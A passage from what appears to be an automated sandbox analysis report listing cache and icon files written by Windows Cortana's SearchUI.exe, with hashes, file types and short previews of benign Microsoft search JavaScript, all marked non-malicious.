                                                            Preview: var __extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),__spreadArrays,WSB;(function(n){var i="NT",p="NF",t="https://substrate.office.com{0}/api/v1/",w=t+"events",o=t+"init",b=t+"suggestions?query=",k=t+"query",d=t+"recommendations",s="SubstrateSearchService",g="https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/{0}?Protocol={1}",r="AutoDiscoveryKey",h="gwsflt.",nt="textdecorations",c="scenario",tt="setflight",it="debug",l="entitytypes",rt="1",ut="scopes",ft="people.directorysearch",et="Authorization",f="Content-Type",ot="X-AnchorMailbox",st="X-Client-Language",ht="X-Client-LocalTime",a="Client-Request-Id",v="User-Agent",ct="X-Debug-ExternalExp",lt="X-Client-Flights"
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\XlOxpNAPazK1Ul3yuHNFQLgvMig.br[2].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\ZkAG-UZl4xeENnu1psdKTgHhS2A.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:modified
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\b7PYrtpXGXE_bvZ4M1MrlULeVLE.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):44752
                                                            Entropy (8bit):5.5814908250758455
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:3CD24086581E8185051876E4AC6BE8AB
                                                            SHA1:8FBD2F8D7C8B87C3433E157A8DB05CF00A303CB4
                                                            SHA-256:69923A7FE888459B43B39338F63164221DFBE1D2ECEA558BA073AED27B0E7F9D
                                                            SHA-512:73918F6F28FDFAFC070365B9C996CC157A37DF63C1EB8C59A9FC39F0DCD1C9EEFA00F4873FCA626785FEFA33E86D235ED1D066230B30785011A42BEFD35A3535
                                                            Malicious:false
                                                            Preview: var WSB;(function(n){function c(n){return n.toLocaleLowerCase().replace(l,"").trim()}function v(){return o}function e(n,t,i,r,u){if(!n)return i;if(typeof n!="string")try{return{content:URL.createObjectURL(n),type:0,bgColor:r}}catch(f){return SharedLogHelper.LogError("convertToHtmlImage "+t,u,f),i}else return{content:n,type:0,bgColor:r}}var o="data:img/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAR4UlEQVR4nMVbe4wd5XX/nW/m7nr9XNtpMSqpAZOShLbQ8gpgIFHU/EOSmiJASaWqqqmCUpqakMoxCKEopXbVQoiEqigyJFFaEVInMcSkokqa3YQIh9CAIAZMvH6AIfiBd+193cfMd6pzvsfM3Hv3Za/Jt5qd973f+Z1zfucxc4mZcTrHRT95cwPA6xj2fMAuY7J9gHynLBagYk1kZTsjsmMEux/A/sRk33r28ksfPV1TnHcALh58ezXD3s2w1zHsqiAge6EZeUloiwiG3xYQyK/lmJF9skzIDyVJ9gSR/eLTf3rtgfma77wBcMng8Q2AvY1h17AKbMFRQL8vwuu3OkAoAFECQPaJisUBINfmMCaHoQzG2CFD+YM/vfDPHjjVeZ8yAJcOnhATv4fB/U7DNi6iaV0jrxwL11UFd0IShe1i3+jaIk1aCgApEBbGZJOGsi//7wV/vukdB+CywfHVAP9INO4ECkI5TTMhah5toBTHg/kHSwjaLtZyPjEOAGNaCoazhNwBYjLZHjEm/8KT5980Z4s4KQAuH5zYDPBGVjHZ+7fVvwCA0z6XTF9cojD5CgDeEqjMAwU
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\b7PYrtpXGXE_bvZ4M1MrlULeVLE.br[2].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\p_H40Ndq102p2Socno0_V88cqhw[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\sWWssH4VwKKxySDezvIayxUduKc[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\zEQqhwKoETyGdQapOnP2uL1FFF0.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):202174
                                                            Entropy (8bit):4.353086485551748
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:30F68A3EA9F8FE63101E59CED32FA3E7
                                                            SHA1:0450964533A5363F20FD7A7AE16821CDFC1FCC1D
                                                            SHA-256:90FCCF6342D5BCFDE3F69F88B80253EC694B9B901CC55FD84A2E0C6E0FF05CAF
                                                            SHA-512:F994377757539611FE2781B6AEEDCFE2B2C7073516C0F3887C0FD836E1ED69066DAABE7065DAE1FC4AA071F8F5080939591B3EBD4642B1EAA42C7B25C2003349
                                                            Malicious:false
                                                            Preview: var WSB;(function(n){var t;(function(n){var t;(function(n){function t(n,t){return n[t]?n[t]:0}function i(n){return t(n,282)>.3896?t(n,282)>.38961?t(n,267)>.6104?t(n,39)>.0145?t(n,282)>.66669?t(n,38)>7124751?t(n,103)>.99997?.49246:.46311:.42968:.2235:t(n,3)>.03371?.4983:t(n,282)>.62505?t(n,25)>.503?t(n,47)>2.5?.44633:.30993:t(n,38)>223508416?.47784:t(n,269)>4502?t(n,269)>4565?.47772:t(n,284)>1.5?t(n,103)>.99997?.49992:.4902:.4969:.45473:.15382:t(n,267)>.61031?-.49998:.23231:.48906:t(n,0)>.50822?t(n,266)>.00112?-.29242:t(n,41)>.9715?.42523:t(n,41)>.3765?t(n,421)>.71793?t(n,38)>67927560?.44213:.43113:.3727:t(n,24)>.1855?-.031:.35364:t(n,103)>.98373?t(n,421)>.69234?t(n,266)>.00112?-.08047:.41851:t(n,94)>.7673?.4414:t(n,38)>5528556?t(n,94)>.17559?t(n,40)>.1685?.19613:-.26247:-.28885:.21078:t(n,266)>.24569?t(n,1)>.5?t(n,0)>.00477?t(n,266)>.25463?-.43181:t(n,264)>.53942?-.49933:-.27443:t(n,264)>.53942?t(n,266)>.25463?-.46023:-.49705:-.45348:t(n,38)>694628928?t(n,41)>.2425?t(n,267)>.6104?-.441
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\WEDH7B9W\zEQqhwKoETyGdQapOnP2uL1FFF0.br[2].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\03FMIZBH\www.bing[1].xml
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\0NFY1WC2\www.bing[1].xml
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):109
                                                            Entropy (8bit):4.716834990888681
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:5A81046E367565C15AC4F61BE230EC00
                                                            SHA1:3BB183F538785610BBF5E52C825C1F329CD63EDB
                                                            SHA-256:7D729EDB4FC77B91434B314495B30A26221ADA539492AA0EFE0928DFBC12C6CB
                                                            SHA-512:CED2D279AF8D339B7D850CA763C3F36AEC663337E8491E774EC2ADA6D858B4305DFAAC73DAB5AB4B5D4D34CE8DEC05B2A2071A934A99070D153FF792EA88EF72
                                                            Malicious:false
                                                            Preview: <root></root><root><item name="eventLogQueue_Online" value="[]" ltime="1721138960" htime="30873365" /></root>
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_BingWeather_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_GetHelp_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Getstarted_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MSPaint_8wekyb3d8bbwe!Microsoft_MSPaint
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Messaging_8wekyb3d8bbwe!x27e26f40ye031y48a6yb130yd1f20388991ax
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Microsoft3DViewer_8wekyb3d8bbwe!Microsoft_Microsoft3DViewer
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft_MicrosoftOfficeHub
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftSolitaireCollection_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftStickyNotes_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_OneNote_8wekyb3d8bbwe!microsoft_onenoteim
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_OneConnect_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_PPIProjection_cw5n1h2txyewy!Microsoft_PPIProjection
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_People_8wekyb3d8bbwe!x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Print3D_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsAlarms_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsCalculator_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsCamera_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
